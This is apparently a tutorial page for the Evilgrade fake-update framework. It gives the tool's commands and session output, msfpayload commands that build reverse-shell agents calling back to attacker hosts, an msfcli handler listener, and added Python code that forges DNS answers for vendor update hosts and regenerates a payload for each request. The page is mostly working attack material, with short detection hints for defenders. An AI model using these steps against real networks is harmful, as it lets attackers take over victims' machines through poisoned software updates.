Hacking with Evilgrade
[Youtube Data] Public Data - [Evilgrade]
Title: Hacking with Evilgrade
Note: Users of the program are responsible for any problems arising from its use for purposes other than testing.
Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.
Content:
A demonstration video of the Evilgrade tool. Evilgrade pairs a DNS server that answers queries for vendor update hosts with the attacker's address and a web server that serves fake updates in place of the real ones; the demonstration therefore depends on the victim's DNS traffic being redirected to the attacker.
Description:
Evilgrade is a modular framework that lets the user take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and its own WebServer and DNSServer modules. New settings are easy to add, and agent details are auto-configured when a new binary agent is set.
Information:
Commands:
configure / conf - Configure a module (with no argument, return to the global configuration)
Example #1
evilgrade>configure sunjava
evilgrade(sunjava)>

evilgrade>conf sunjava
evilgrade(sunjava)>

## 'conf' with no argument takes us back to the global configuration
evilgrade(sunjava)>conf
evilgrade>

reload - Reload all modules (refreshes loaded modules; useful during development)
start - Start the services (webserver and DNS server, i.e. the fake update server)
stop - Stop the services
Example #2
evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

evilgrade>stop
Stopping WEBSERVER [OK]
Stopping DNSSERVER [OK]

restart - Restart the services (WebServer and DNS Server): stops and starts them again

status - Get webserver and victim status
Example:
evilgrade>show status
Webserver (pid 4134) already running
Users status:
============
.---------------------------------------------------------------------------------------------------------------.
| Client         | Module           | Status | Md5,Cmd,File                                                     |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |
'----------------+------------------+--------+------------------------------------------------------------------'

show - Display information about <object>
show active - Display the modules active in the webserver
show modules - Display the implemented modules
show options - Display module or global options
Example:
evilgrade>show options
Display options:
===============
.-----------------------------------------------------------------------------------.
| Name        | Default   | Description                                             |
+-------------+-----------+---------------------------------------------------------+
| DNSEnable   | 1         | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip                                     |
| DNSPort     | 53        | Listen Name Server port                                 |
| debug       | 1         | Debug mode                                              |
| port        | 80        | Webserver listening port                                |
| sslport     | 443       | Webserver SSL listening port                            |
'-------------+-----------+---------------------------------------------------------'
evilgrade>

evilgrade(notepadplus)>conf vmware
evilgrade(vmware)>show options          (services not started)
Display options:
===============
Name = VMware Server
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
Description = ""
VirtualHost = "www.vmware.com"
.----------------------------------------------.
| Name   | Default           | Description     |
+--------+-------------------+-----------------+
| enable | 1                 | Status          |
| agent  | ./agent/agent.exe | Agent to inject |
'--------+-------------------+-----------------'

evilgrade(vmware)>show options          (services started, after setting the agent)
Display options:
===============
Name = VMware Server
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
Description = ""
VirtualHost = "www.vmware.com"
.--------------------------------------------------------------------------------------------------.
| Name        | Default                                                          | Description     |
+-------------+------------------------------------------------------------------+-----------------+
| enable      | 1                                                                | Status          |
| agentmd5    | f80af637642170507bda998b6f2015fa                                 |                 |
| agentsize   | 54576                                                            |                 |
| agent       | ./agent/agent.exe                                                | Agent to inject |
| agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd |                 |
'-------------+------------------------------------------------------------------+-----------------'

set - Set global or module variables
Example:
evilgrade>show options
Display options:
===============
.-----------------------------------------------------------------------------------.
| Name        | Default   | Description                                             |
+-------------+-----------+---------------------------------------------------------+
| DNSEnable   | 1         | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip                                     |
| DNSPort     | 53        | Listen Name Server port                                 |
| debug       | 0         | Debug mode                                              |
| port        | 80        | Webserver listening port                                |
| sslport     | 443       | Webserver SSL listening port                            |
'-------------+-----------+---------------------------------------------------------'

### Let's enable the debug option and set DNSAnswerIp to our own interface address (192.168.1.4)
evilgrade>set debug 1                    # Enable debug
set debug, 1
evilgrade>set DNSAnswerIp 192.168.1.4    # Address returned in DNS answers for module vhosts: the IP where Evilgrade's webserver is reachable
set DNSAnswerIp, 192.168.1.4
evilgrade>show options
Display options:
===============
.-------------------------------------------------------------------------------------.
| Name        | Default     | Description                                             |
+-------------+-------------+---------------------------------------------------------+
| DNSEnable   | 1           | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip                                     |
| DNSPort     | 53          | Listen Name Server port                                 |
| debug       | 1           | Debug mode                                              |
| port        | 80          | Webserver listening port                                |
| sslport     | 443         | Webserver SSL listening port                            |
'-------------+-------------+---------------------------------------------------------'

exit - Exit the program
help - Print this screen, or help on 'command'
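What the DNSEnable/DNSAnswerIp options amount to on the wire, as an added Python illustration written for this page (not Evilgrade's own Perl DNSSERVER module): it parses a raw A query and, when the name is one of the module VirtualHosts, forges a response pointing it at DNSAnswerIp; any other name returns None, meaning it would be passed on to a real resolver. www.vmware.com is the VirtualHost shown by show options above; updates.example.com and the query bytes are constructed for the example.

```python
import socket
import struct

# Constructed vhost table. www.vmware.com is the VirtualHost of the vmware module on
# this page; updates.example.com is a made-up entry to show that the lookup is generic.
MODULE_VHOSTS = {
    "www.vmware.com": "vmware",
    "updates.example.com": "hypothetical_module",
}


def parse_qname(packet, offset):
    """Read an uncompressed DNS name starting at offset; return (name, next_offset)."""
    labels = []
    while True:
        length = packet[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0:
            raise ValueError("compression pointer in a question name is not expected")
        labels.append(packet[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def build_query(name, txid=0x1234):
    """Build a standard A query as a stub resolver would send it (constructed input)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def spoof_answer(query, answer_ip, vhosts=MODULE_VHOSTS, ttl=60):
    """Forge a response mapping a module vhost to answer_ip (DNSAnswerIp).
    Returns None when the name is not one of ours, i.e. leave it to a real resolver."""
    txid, _flags, qdcount = struct.unpack("!HHH", query[:6])
    if qdcount != 1:
        return None
    name, end = parse_qname(query, 12)
    qtype, qclass = struct.unpack("!HH", query[end:end + 4])
    if (qtype, qclass) != (1, 1) or name.lower() not in vhosts:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA; one answer
    question = query[12:end + 4]
    # Answer RR: name pointer to offset 12 (0xC00C), TYPE A, CLASS IN, TTL, RDLENGTH 4
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(answer_ip)
    return header + question + answer


def answered_ip(response):
    """Extract the address from the first A record of a response built above."""
    ancount = struct.unpack("!H", response[6:8])[0]
    if ancount == 0:
        return None
    _, end = parse_qname(response, 12)
    end += 4  # skip QTYPE/QCLASS of the echoed question
    rdlength = struct.unpack("!H", response[end + 10:end + 12])[0]
    return socket.inet_ntoa(response[end + 12:end + 12 + rdlength])


if __name__ == "__main__":
    for host in ("www.vmware.com", "www.example.net"):
        resp = spoof_answer(build_query(host), "192.168.1.4")
        print(host, "->", answered_ip(resp) if resp else "not a module vhost, forward")
```

This only bites when the victim's queries actually reach the attacker's port 53 (ARP spoofing, a rogue DHCP-assigned resolver, and so on); with DNSEnable set to 0 the redirection has to come from elsewhere entirely. From the defender's side the same fact is the detection hook: a vendor update hostname resolving to an RFC 1918 or otherwise unexpected address is exactly what this forged answer looks like.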
Advanced
Module options: each module has its own options, but the "agent" field is always present. The agent is our fake update binary; we either set the path to the file where it is located or use dynamic fake update binary generation, in which a command is run to produce a fresh binary for each request.
Example #1-1
evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
In this case, for every update binary the client requests, we generate a fresh fake update binary carrying the payload "windows/shell_reverse_tcp", a reverse shell that connects back to 192.168.233.2 on port 4141. The <%OUT%> tags are a special marker around the path where the output binary is written, so Evilgrade knows which file to serve. Evilgrade recognises the dynamic fake update binary feature when the agent value is enclosed in square brackets []; inside the brackets is a double-quoted string (a Perl expression) that is evaluated with Perl before the result is executed as a command.
For example if we use:
evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'
then every time a binary is requested, Evilgrade evaluates the expression and executes the resulting string, "./generatebin -o /tmp/update(random).exe", so each request produces a different agent.
A simpler, non-dynamic alternative is to generate the payload directly with msfpayload in a terminal and assign the resulting file manually in the module's configuration. (msfpayload and msfcli have since been removed from Metasploit; msfvenom and msfconsole provide the same functions.)
Example #1-2
(Outside evilgrade)
[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe
(Inside evilgrade)
evilgrade(sunjava)>set agent /tmp/reverse-shell.exe
After the payload has been generated, we leave a multi/handler listening on the LHOST and LPORT assigned above. The PAYLOAD given to the handler must be the one the agent was built with (windows/meterpreter/reverse_ord_tcp here); with a mismatched payload the agent connects back but no usable session is established.
(Outside evilgrade)
[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 E
[*] Started reverse handler on 192.168.100.2:4444
[*] Starting the payload handler...
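The two ways of setting the agent above (the bracketed dynamic form with <%OUT%> tags from Example #1-1, and the static path from Example #1-2), as an added Python illustration written for this page rather than Evilgrade's own Perl: it parses the setting, strips the <%OUT%> tags to obtain the command to run and the file to serve, runs the generator per request, and computes the agentmd5/agentsize/agentsha256 values that show options reports. Evilgrade evaluates the bracket contents as Perl; this stand-in only accepts a plain double-quoted string and raises for the ".int(rand(256))." form. In demo(), a printf writing a 6-byte stub to a temporary directory plays the role of msfpayload (constructed input, not a real payload).

```python
import hashlib
import os
import re
import subprocess
import tempfile

OUT_TAG = "<%OUT%>"


def parse_agent_setting(value):
    """Split an `agent` value into (is_dynamic, body).
    Static: a file path. Dynamic: a bracketed Perl expression ["..."], typed on the
    evilgrade prompt inside single quotes, which are dropped here."""
    value = value.strip().strip("'")
    m = re.fullmatch(r"\[(.*)\]", value, re.DOTALL)
    if m:
        return True, m.group(1).strip()
    return False, value


def perl_string_literal(expr):
    """Evilgrade evals the bracket contents as Perl. Only the plain case, one
    double-quoted literal, is modelled; "..".int(rand(256)).".." needs a real Perl eval."""
    m = re.fullmatch(r'"([^"]*)"', expr)
    if not m:
        raise NotImplementedError("Perl expression evaluation is not modelled: " + expr)
    return m.group(1)


def split_dynamic(command_with_tags):
    """Return (shell_command, output_path): the command with the <%OUT%> tags removed,
    and the path that sat between them, which is the file served after the command runs."""
    parts = command_with_tags.split(OUT_TAG)
    if len(parts) != 3:
        raise ValueError("expected exactly one <%OUT%>...<%OUT%> span")
    before, out_path, after = parts
    return before + out_path + after, out_path


def fingerprint(path):
    """The agentmd5 / agentsize / agentsha256 values show options reports once services run."""
    with open(path, "rb") as f:
        data = f.read()
    return {"agentmd5": hashlib.md5(data).hexdigest(),
            "agentsize": len(data),
            "agentsha256": hashlib.sha256(data).hexdigest()}


def resolve_agent(value):
    """Produce the file to serve for one update request, regenerating it if dynamic."""
    dynamic, body = parse_agent_setting(value)
    if not dynamic:
        return body, fingerprint(body)
    command, out_path = split_dynamic(perl_string_literal(body))
    subprocess.run(command, shell=True, check=True)  # generator runs on every request
    return out_path, fingerprint(out_path)


def demo():
    """Constructed stand-in for msfpayload: the 'generator' writes a 6-byte stub."""
    workdir = tempfile.mkdtemp()
    out_path = os.path.join(workdir, "a.exe")
    setting = "'[\"printf MZfake > " + OUT_TAG + out_path + OUT_TAG + "\"]'"
    served, fp = resolve_agent(setting)
    return {"served": served, "expected": out_path, **fp}


if __name__ == "__main__":
    print(demo())
```

The practical consequence of the dynamic form is visible in the fingerprint: a static agent has one md5/sha256 that an endpoint product can block once it is known, whereas a generator that randomises its output (as the /tmp/update(random).exe example does) hands every victim a different file, so defenders should key on the delivery path (update host answered by an unexpected address, update fetched over plain HTTP) rather than on the agent's hash.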